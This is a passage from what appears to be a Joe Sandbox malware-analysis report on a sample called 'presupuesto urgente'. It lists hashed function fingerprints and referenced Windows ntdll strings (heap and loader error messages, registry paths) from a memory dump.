                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                      • API String ID: 0-1468400865
                                                                                                                                                      • Opcode ID: b9a2b8cc23682b46f58b91ee8887da160e0db618256c2a39bab55b072ff501f0
                                                                                                                                                      • Instruction ID: c9903abf05c2c514ccbb8edd9a6a5e5c1614d7b3b40974eed083bd68e618a3e0
                                                                                                                                                      • Opcode Fuzzy Hash: b9a2b8cc23682b46f58b91ee8887da160e0db618256c2a39bab55b072ff501f0
                                                                                                                                                      • Instruction Fuzzy Hash: FF71CFB1D053049FD790CF54E8C5B8B7BA8EF857A4F940869F8888B686D734D588CB92
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                      • API String ID: 0-2586055223
                                                                                                                                                      • Opcode ID: ee073ad5efc56eaf1bf43eddf4c11d71bc7190f03512435f7908c2dc6f19dedb
                                                                                                                                                      • Instruction ID: 4d4a0165700b1032ff0a0d4b58c0b21ad5bf0e64cd2934e7274e886b86c9a9c6
                                                                                                                                                      • Opcode Fuzzy Hash: ee073ad5efc56eaf1bf43eddf4c11d71bc7190f03512435f7908c2dc6f19dedb
                                                                                                                                                      • Instruction Fuzzy Hash: 2E61DF75744380AFE311CB64F844F57BBF9EF84790F480969E9A5DB6A1CA34E800CB62
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                      • API String ID: 0-1391187441
                                                                                                                                                      • Opcode ID: fb9589877821c10da7e28fe3f94f679083803b091464553b026f5602d1c3dcf6
                                                                                                                                                      • Instruction ID: 33336e54c19d76bc94b83da0bd228ab7dbfa2449f07cf096504f75050b2dfd9f
                                                                                                                                                      • Opcode Fuzzy Hash: fb9589877821c10da7e28fe3f94f679083803b091464553b026f5602d1c3dcf6
                                                                                                                                                      • Instruction Fuzzy Hash: 7A31F576E01245EFDB11CB55EC84F9ABBB8EF847A0F5448A1E824EB2D1D770E940CE60
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eV3
                                                                                                                                                      • API String ID: 0-2982544236
                                                                                                                                                      • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                      • Instruction ID: 1e49eddd2fba9e2777e89b85699879b7817aa752ad8dbb69ed9b60e8c0cae2b4
                                                                                                                                                      • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                      • Instruction Fuzzy Hash: 9A315EB2D00719BBDB128F95EC44E9EBBBDEF84650F504425E914E7660EB30DA059B90
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: b1c278a5ad27eb73f21184421ca5ef407b22ca7e11a13f6f07d073895fd48503
                                                                                                                                                      • Instruction ID: 7fbf7dc479fe5bd2a4c49cd138e64e0a1cac89614b82ad1452ceffd9e5493d1b
                                                                                                                                                      • Opcode Fuzzy Hash: b1c278a5ad27eb73f21184421ca5ef407b22ca7e11a13f6f07d073895fd48503
                                                                                                                                                      • Instruction Fuzzy Hash: 42512E35E01715EFEB05DB64E8847AEBBB8BF45321F14416AE412E7690DB70DA11CF80
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                      • API String ID: 0-1168191160
                                                                                                                                                      • Opcode ID: c01debdad675c7c7cc4555b80c437be659342b1d2714f9e5d96eed098412eb78
                                                                                                                                                      • Instruction ID: 02c70a84866654cd5992c389a41dce47ff2241e13f5d92997c45fc1caffd6849
                                                                                                                                                      • Opcode Fuzzy Hash: c01debdad675c7c7cc4555b80c437be659342b1d2714f9e5d96eed098412eb78
                                                                                                                                                      • Instruction Fuzzy Hash: CAF18FB5A003AC8BDB20CF94ECC0BD9B3B5AF94758F4440E9D509A7240EB399E85CF95
                                                                                                                                                      Strings
                                                                                                                                                      • HEAP[%wZ]: , xrefs: 33531632
                                                                                                                                                      • HEAP: , xrefs: 335314B6
                                                                                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33531648
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                      • API String ID: 0-3178619729
                                                                                                                                                      • Opcode ID: 660b42d6bf2f2d56fea37fbadc522159be35bf12ae1853bb29d7b658696d4cf5
                                                                                                                                                      • Instruction ID: 70c2479cf70f5fe99bde63247dd6dc86d56b9c99125aabbd2cb5a79ae758f7ee
                                                                                                                                                      • Opcode Fuzzy Hash: 660b42d6bf2f2d56fea37fbadc522159be35bf12ae1853bb29d7b658696d4cf5
                                                                                                                                                      • Instruction Fuzzy Hash: F1E10F74A053419FE714DF78E48077ABBF5AF4A320F188969E4D6CB645EB34DA40CB50
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                      • API String ID: 0-2391371766
                                                                                                                                                      • Opcode ID: 4a2b3bdcab1ab62cbea58afac076fcc5b47514a06f8b079737d881074e74055a
                                                                                                                                                      • Instruction ID: d9fed760cc57511f39ef13d0097b145b48f014cab51cfafe5271f1b3fa9b57d3
                                                                                                                                                      • Opcode Fuzzy Hash: 4a2b3bdcab1ab62cbea58afac076fcc5b47514a06f8b079737d881074e74055a
                                                                                                                                                      • Instruction Fuzzy Hash: 45B1C475A04341AFEB11DF54E884B5BB7F8EF98750F450929FA50EB290DBB0E844CB92
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                      • API String ID: 0-2779062949
                                                                                                                                                      • Opcode ID: d43151940380359fa9aa6724520488232ed75bdd4e767022770eefd80446e106
                                                                                                                                                      • Instruction ID: 830e0e537c02c65a832eb9f839122caab19a0fdd10e9cb0e4281a0a77b0bc13d
                                                                                                                                                      • Opcode Fuzzy Hash: d43151940380359fa9aa6724520488232ed75bdd4e767022770eefd80446e106
                                                                                                                                                      • Instruction Fuzzy Hash: 7FA19B75D016689FDB21CF24DC88B9AB7B8EF44710F1105EAE908EB250DB349E84CF50
                                                                                                                                                      Strings
                                                                                                                                                      • GlobalizationUserSettings, xrefs: 3360B3B4
                                                                                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3360B3AA
                                                                                                                                                      • TargetNtPath, xrefs: 3360B3AF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                      • API String ID: 0-505981995
                                                                                                                                                      • Opcode ID: 5fe110d36091a41301223ce27cefbc3a80aec6fec3c2df4bb5b8055997ad529e
                                                                                                                                                      • Instruction ID: 5b9b34f0d774725dfada0561daff664f7f184ffeb5493453a1f2030708489fe3
                                                                                                                                                      • Opcode Fuzzy Hash: 5fe110d36091a41301223ce27cefbc3a80aec6fec3c2df4bb5b8055997ad529e
                                                                                                                                                      • Instruction Fuzzy Hash: 5D619D72D41329AFDB25DF54DC89BDABBB8EB04714F4141E9A908AB250CB74DE84CF90
                                                                                                                                                      Strings
                                                                                                                                                      • HEAP[%wZ]: , xrefs: 3358E435
                                                                                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3358E455
                                                                                                                                                      • HEAP: , xrefs: 3358E442
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                      • API String ID: 0-1340214556
                                                                                                                                                      • Opcode ID: 9ab769437d6f0c8f80385308bf7ac9b0858a89891976a37ebbe3b352d0401680
                                                                                                                                                      • Instruction ID: e3a73c644425cbf696c13412d757ab62fcb8a8b3ad0f065aa2a0d23f2c222cf6
                                                                                                                                                      • Opcode Fuzzy Hash: 9ab769437d6f0c8f80385308bf7ac9b0858a89891976a37ebbe3b352d0401680
                                                                                                                                                      • Instruction Fuzzy Hash: 83513635B40784AFE315CB64F884F8ABBF8EF44344F4845A4E980CB6A2DB74E910CB51
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 3359A3A7
                                                                                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 3359A396
                                                                                                                                                      • LdrpCompleteMapModule, xrefs: 3359A39D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                      • API String ID: 0-1676968949
                                                                                                                                                      • Opcode ID: 905b6ed9160b003b1d2e3c2dc0d436beed69252c1a7eeb874b1e94cae24b398e
                                                                                                                                                      • Instruction ID: af8f12a8265be4a8819eaf1226d4ba2fdae2e26e3c229da96e00fec5acc5e42a
                                                                                                                                                      • Opcode Fuzzy Hash: 905b6ed9160b003b1d2e3c2dc0d436beed69252c1a7eeb874b1e94cae24b398e
                                                                                                                                                      • Instruction Fuzzy Hash: 6D510174A00741DBFB11CF68E884B5A7BF4AB44754F580A96F8929B7E2DB74EA00CF50
                                                                                                                                                      Strings
                                                                                                                                                      • HEAP[%wZ]: , xrefs: 335DD792
                                                                                                                                                      • HEAP: , xrefs: 335DD79F
                                                                                                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 335DD7B2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                      • API String ID: 0-3815128232
                                                                                                                                                      • Opcode ID: 20dbc53f2e416191795191036361c96b02478fac9db25b892121fc409c6cc763
                                                                                                                                                      • Instruction ID: 152ec827dfc96ab8951617ca645bace31ff3f9ab927812ca92a3126c1071a900
                                                                                                                                                      • Opcode Fuzzy Hash: 20dbc53f2e416191795191036361c96b02478fac9db25b892121fc409c6cc763
                                                                                                                                                      • Instruction Fuzzy Hash: 0C512479100350CEF360EA2EE84077277E1DF45384F954C8AE4D5CB685EA3AE847DBA1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                      • API String ID: 0-1151232445
                                                                                                                                                      • Opcode ID: 0719d594fa38c3070b6a3afd018ea450f8b73700c445425660a920439cdc2ff6
                                                                                                                                                      • Instruction ID: 63c8c3f5fb42225d11a3dc2f2bb6588c92e2fc28fadafacf9f00a87ffba14ff7
                                                                                                                                                      • Opcode Fuzzy Hash: 0719d594fa38c3070b6a3afd018ea450f8b73700c445425660a920439cdc2ff6
                                                                                                                                                      • Instruction Fuzzy Hash: 934157783013808FEB15DE1CE480B65BFF49F01348F6944AAE486CFA93DA74E845CB61
                                                                                                                                                      Strings
                                                                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 3353A229
                                                                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 3353A21B
                                                                                                                                                      • @SP3, xrefs: 3353A268
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @SP3$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                      • API String ID: 0-3693520180
                                                                                                                                                      • Opcode ID: c66ff5c560f4a11f8d536542383ad286b1656b680c261a8ae3c448d8c10c57e6
                                                                                                                                                      • Instruction ID: 48781a59d274b44fe33a3761993b57c26c15e8e04225342d32849595909f42f2
                                                                                                                                                      • Opcode Fuzzy Hash: c66ff5c560f4a11f8d536542383ad286b1656b680c261a8ae3c448d8c10c57e6
                                                                                                                                                      • Instruction Fuzzy Hash: 4141D174A09748DBEB05CFA9E440B9977B8FF86760F1484A5FC44DB2A1E736D950CB10
                                                                                                                                                      Strings
                                                                                                                                                      • @, xrefs: 335BB2F0
                                                                                                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 335BB2B2
                                                                                                                                                      • GlobalFlag, xrefs: 335BB30F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                      • API String ID: 0-4192008846
                                                                                                                                                      • Opcode ID: c542278b1443ff9c1f83537ff27c9c1993a119eb6e8c7a7a8fe3f0f2ed90324f
                                                                                                                                                      • Instruction ID: 33001715bcc0f1cd60ae729632780614ef3615752bfd1aaed043b3272a9fd007
                                                                                                                                                      • Opcode Fuzzy Hash: c542278b1443ff9c1f83537ff27c9c1993a119eb6e8c7a7a8fe3f0f2ed90324f
                                                                                                                                                      • Instruction Fuzzy Hash: 6E313AB1E01209AEDF10DF95EC80BEEBBBCEF44744F950469EA05E7251D7B49A048BA0
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 335A185B
                                                                                                                                                      • LdrpInitializeTls, xrefs: 335A1851
                                                                                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 335A184A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                      • API String ID: 0-931879808
                                                                                                                                                      • Opcode ID: 40b08ea354c01e62850d7bdc201c517292c83b2ee1c1024ccb72fb693c6eb1ae
                                                                                                                                                      • Instruction ID: 43071c5527a683ab7ddeccf1c99457fd9f3e7e8a554b20192d953bdcdf37b612
                                                                                                                                                      • Opcode Fuzzy Hash: 40b08ea354c01e62850d7bdc201c517292c83b2ee1c1024ccb72fb693c6eb1ae
                                                                                                                                                      • Instruction Fuzzy Hash: FD31EB71E00300BFE7209B54EC65B7AF7B8AB65798F421819E541F7290EB70AF458B90
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$@
                                                                                                                                                      • API String ID: 0-149943524
                                                                                                                                                      • Opcode ID: 4cb7e74054aabf1d68e1038ef70746b62819f8d6082fe5a3f9a7bcf513edb4c0
                                                                                                                                                      • Instruction ID: ee7ae31aedca7d9746db2d9d8091aa73472bff00a15103ba7c9b0b3026d23a73
                                                                                                                                                      • Opcode Fuzzy Hash: 4cb7e74054aabf1d68e1038ef70746b62819f8d6082fe5a3f9a7bcf513edb4c0
                                                                                                                                                      • Instruction Fuzzy Hash: DD32AEB45083518BE728CF14E480B7EB7E5EF88754F944D2EF9858B690EB34D944CB92
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: c1abe2d8d2ffeb2a1f07ed1e4bc0d38d5edbc53de7f84776658a7923e256b019
                                                                                                                                                      • Instruction ID: 5377ea89d78eea3ef7defe2b5f0c2b1fa0319d9b58b6268b2427e0defb20b6ca
                                                                                                                                                      • Opcode Fuzzy Hash: c1abe2d8d2ffeb2a1f07ed1e4bc0d38d5edbc53de7f84776658a7923e256b019
                                                                                                                                                      • Instruction Fuzzy Hash: 1431DE31642B02AFE7469F25E980B8AFBB9BF85764F445825E94187E50DB74E831CFC0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                                                      • Opcode ID: a2cb9c0e73110b989ca5f3f542f65b07e065660873b09c912bf67a2152503540
                                                                                                                                                      • Instruction ID: 36534b966b02ad8e4b948cdf998d545a9617de9c5b842e89bb24ed98f576a3a0
                                                                                                                                                      • Opcode Fuzzy Hash: a2cb9c0e73110b989ca5f3f542f65b07e065660873b09c912bf67a2152503540
                                                                                                                                                      • Instruction Fuzzy Hash: 87616DB1E403089FDB15CFACE840AADB7F9FF48340F54446AE559EB661EA30D901DB60
                                                                                                                                                      Strings
                                                                                                                                                      • RedirectedKey, xrefs: 3360B60E
                                                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3360B5C4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                      • API String ID: 0-1388552009
                                                                                                                                                      • Opcode ID: bbcc51d2fa70da1c7166ce4c4e9e2255e1bcde0fd0784a3e3d6b4529f02aa8cc
                                                                                                                                                      • Instruction ID: 334ee26ce60a8058bc417a6676cba7f42bea2342e9360120b3887b729129921a
                                                                                                                                                      • Opcode Fuzzy Hash: bbcc51d2fa70da1c7166ce4c4e9e2255e1bcde0fd0784a3e3d6b4529f02aa8cc
